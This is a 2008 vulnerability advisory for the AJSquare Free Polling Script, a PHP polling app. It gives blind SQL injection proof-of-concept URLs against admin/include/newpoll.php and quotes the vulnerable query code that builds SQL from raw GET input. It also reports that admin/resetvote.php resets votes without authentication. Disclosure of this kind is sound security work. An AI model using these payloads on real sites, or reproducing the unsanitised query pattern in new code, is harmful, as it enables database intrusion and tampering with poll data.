AJSquare Free Polling Script (DB) Multiple Vulnerabilities [&#187;] Script: [ AJSquare Free Polling Script DataBase Version ] [&#187;] Language: [ PHP ] [&#187;] Website: [ http://www.ajsquare.com/resources/dpoll.php?resource=free_script ] [&#187;] Type: [ Free ] [&#187;] Report-Date: [ 10.11.2008 ] [&#187;] Founder: [ G4N0K <mail.ganok[at]gmail.com> ] ===[ XPL ]=== [1][!] Blind SQLi (MQ = off) [&#187;] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=5/* True [&#187;] http://127.0.0.1/[path]/admin/include/newpoll.php?ques=1%27/**/AND/**/substring(@@version,1,1)=4/* False [../admin/include/newpoll.php] <?php require 'connect.php'; $ques = $_GET[ques]; $total = $_GET[total]; for($i=1;$i<=$total;$i++) { $val[] = array($_GET["val".$i]); } $sqlnew = "select * from newpoll where question='$ques'"; $resnew = mysql_query($sqlnew); [../admin/include/newpoll.php] [2][!] Reset Votes - Just call resetvote.php ;) [&#187;] http://127.0.0.1/[path]/admin/resetvote.php ===[ Greetz ]=== [&#187;] ALLAH [&#187;] Tornado2800 <Tornado2800[at]gmail.com> [&#187;] Hussain-X <darkangel_g85[at]yahoo.com> //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... exit();